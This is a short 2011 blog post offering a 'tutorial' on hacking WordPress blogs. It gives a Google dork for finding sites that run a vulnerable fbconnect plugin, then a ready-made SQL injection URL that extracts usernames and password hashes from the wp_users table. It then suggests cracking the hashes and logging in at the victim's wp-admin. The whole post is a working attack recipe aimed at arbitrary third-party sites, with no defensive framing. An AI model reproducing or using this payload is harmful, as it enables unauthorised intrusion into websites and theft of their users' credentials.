Tuesday, 18 October 2011


So its a New Tut of Wordpress Blog Hacking,,,, Lets Start ...
Google this dork

inurl:"fbconnect_action=myhome"


You will find many sites, Select the site which you are comfortable with.
The website URL will be like this-
http://www.site.com/?fbconnect_action=myhome&userid=

Now replace the
?fbconnect_action=myhome&userid=

with this

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa​ss)z0mbyak,7,8,9,10,11,12+from+wp_users-- 

Now the URL will be like-

www.site.com/?fbconnect_action=myhome&userid=
with this
www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa​ss)z0mbyak,7,8,9,10,11,12+from+wp_users--

Now you have the User name and Password.


The password is encrypted with Wordpress md5 (blowfish). You need to decrypt this. I recommend using PasswordsPRO!

Then find the administrator panel out. Normally it should be in
www.victrimsite.com/wp-admin

Rest you know........ ;)

0 comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...